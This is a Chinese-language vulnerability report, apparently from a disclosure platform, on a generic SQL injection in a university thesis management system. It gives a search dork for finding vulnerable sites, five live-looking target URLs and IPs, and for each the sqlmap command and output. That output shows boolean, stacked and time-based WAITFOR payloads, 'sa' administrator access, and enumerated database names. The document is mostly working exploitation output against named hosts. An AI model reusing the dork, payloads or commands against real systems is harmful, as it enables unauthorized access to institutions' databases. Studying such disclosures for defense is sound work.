### 简要描述:
论文管理系统存在通用型SQL注入
### 详细说明:
注入点:dbid和docid
搜索关键字:inurl:/docinfo.action?dbid=
[<img src="https://images.seebug.org/upload/201501/14143342fcf43465308f6bc3497cfd0583701857.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14143342fcf43465308f6bc3497cfd0583701857.png)
http://202.195.136.150/docinfo.action?dbid=72&docid=40824
http://202.199.163.37/docinfo.action?dbid=72&docid=40619
http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793
http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927
http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517
1)http://202.195.136.150/docinfo.action?dbid=72&docid=40824
sqlmap.py -u "http://202.195.136.150/docinfo.action?dbid=72&docid=40824" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 61 HTTP(s) requ
ests:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 9888=9888&docid=40824
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40824
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40824
---
[17:25:15] [INFO] testing MySQL
[17:25:32] [WARNING] the back-end DBMS is not MySQL
[17:25:32] [INFO] testing Oracle
[17:25:49] [WARNING] the back-end DBMS is not Oracle
[17:25:49] [INFO] testing PostgreSQL
[17:26:06] [WARNING] the back-end DBMS is not PostgreSQL
[17:26:06] [INFO] testing Microsoft SQL Server
[17:26:23] [INFO] confirming Microsoft SQL Server
[17:27:15] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[17:27:15] [INFO] fetching current user
[17:27:15] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:27:15] [INFO] retrieved:
[17:29:12] [INFO] retrieved:
[17:29:12] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
sa
current user: 'sa'
[17:36:12] [INFO] fetching current database
[17:36:12] [INFO] retrieved:
[17:38:10] [INFO] retrieved: etd4
current database: 'etd4'
[17:50:28] [INFO] fetching database names
[17:50:28] [INFO] fetching number of databases
[17:50:28] [INFO] retrieved:
[17:51:19] [INFO] retrieved: 7
[17:53:44] [INFO] retrieved:
[17:55:41] [INFO] retrieved: etd4
[18:07:59] [INFO] retrieved:
[18:09:57] [INFO] retrieved: etd4new
[18:30:04] [INFO] retrieved:
[18:32:01] [INFO] retrieved: idl
[18:41:45] [INFO] retrieved:
[18:43:44] [INFO] retrieved: master
[19:01:04] [INFO] retrieved:
[19:03:01] [INFO] retrieved: model
[19:18:02] [INFO] retrieved:
[19:20:01] [INFO] retrieved: msdb
[19:32:17] [INFO] retrieved:
[19:34:15] [INFO] retrieved: temp
[19:47:23] [ERROR] invalid character detected. retrying..
[19:47:23] [WARNING] increasing time delay to 6 seconds
db
available databases [7]:
[*] etd4
[*] etd4new
[*] idl
[*] master
[*] model
[*] msdb
[*] tempdb
2)http://202.199.163.37/docinfo.action?dbid=72&docid=40619
sqlmap.py -u "http://202.199.163.37/docinfo.action?dbid=72&docid=40619" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 4908=4908&docid=40619
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40619
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40619
---
[09:45:41] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[09:45:41] [INFO] fetching current user
[09:45:41] [INFO] resumed: sa
current user: 'sa'
[09:45:41] [INFO] fetching current database
[09:45:41] [INFO] resumed: etd
current database: 'etd'
[09:45:41] [INFO] fetching database names
[09:45:41] [INFO] fetching number of databases
[09:45:41] [INFO] resumed: 5
[09:45:41] [INFO] resumed: etd
[09:45:41] [INFO] resumed: master
[09:45:41] [INFO] resumed: model
[09:45:41] [INFO] resumed: msdb
[09:45:41] [INFO] resumed: tempdb
available databases [5]:
[*] etd
[*] master
[*] model
[*] msdb
[*] tempdb
3)http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793
sqlmap.py -u "http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 1458=1458&docid=5793
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=5793
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=5793
---
[13:58:21] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:58:21] [INFO] fetching current user
[13:58:21] [INFO] resumed: sa
current user: 'sa'
[13:58:21] [INFO] fetching current database
[13:58:21] [INFO] resumed: etd
current database: 'etd'
[13:58:21] [INFO] fetching database names
[13:58:21] [INFO] fetching number of databases
[13:58:21] [INFO] resumed: 10
[13:58:21] [INFO] resumed: etd
[13:58:21] [INFO] resumed: lunwen
[13:58:21] [INFO] resumed: master
[13:58:21] [INFO] resumed: model
[13:58:21] [INFO] resumed: msdb
[13:58:21] [INFO] resumed: ReportServer
[13:58:21] [INFO] resumed: ReportServerTempDB
[13:58:21] [INFO] resumed: tempdb
[13:58:21] [INFO] resumed: test
[13:58:21] [INFO] resumed: tsk
available databases [10]:
[*] etd
[*] lunwen
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] tsk
4)http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927
sqlmap.py -u "http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 7461=7461&docid=13927
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=13927
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=13927
---
[11:41:58] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[11:41:58] [INFO] fetching current user
[11:41:58] [INFO] resumed: etd
current user: 'etd'
[11:41:58] [INFO] fetching current database
[11:41:58] [INFO] resumed: etd4
current database: 'etd4'
[11:41:58] [INFO] fetching database names
[11:41:58] [INFO] fetching number of databases
[11:41:58] [INFO] resumed: 9
[11:41:58] [INFO] resumed: chek
[11:41:58] [INFO] resumed: etd4
[11:41:58] [INFO] resumed: idl30
[11:41:58] [INFO] resumed: master
[11:41:58] [INFO] resumed: model
[11:41:58] [INFO] resumed: msdb
[11:41:58] [INFO] resumed: ReportServer$LIB
[11:41:58] [INFO] resumed: ReportServer$LIBTempDB
[11:41:58] [INFO] resumed: tempdb
available databases [9]:
[*] chek
[*] etd4
[*] idl30
[*] master
[*] model
[*] msdb
[*] ReportServer$LIB
[*] ReportServer$LIBTempDB
[*] tempdb
5)http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517
sqlmap.py -u "http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 1334=1334&docid=62517
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=62517
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=62517
---
[13:59:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:59:22] [INFO] fetching current user
[13:59:22] [INFO] resumed: sa
current user: 'sa'
[13:59:22] [INFO] fetching current database
[13:59:22] [INFO] resumed: etd
current database: 'etd'
[13:59:22] [INFO] fetching database names
[13:59:22] [INFO] fetching number of databases
[13:59:22] [INFO] resumed: 7
[13:59:22] [INFO] resumed: etd
[13:59:22] [INFO] resumed: idl30
[13:59:22] [INFO] resumed: idl30oooo
[13:59:22] [INFO] resumed: master
[13:59:22] [INFO] resumed: model
[13:59:22] [INFO] resumed: msdb
[13:59:22] [INFO] resumed: tempdb
available databases [7]:
[*] etd
[*] idl30
[*] idl30oooo
[*] master
[*] model
[*] msdb
[*] tempdb
### 漏洞证明:
已证明
京公网安备 11010502034610号
暂无评论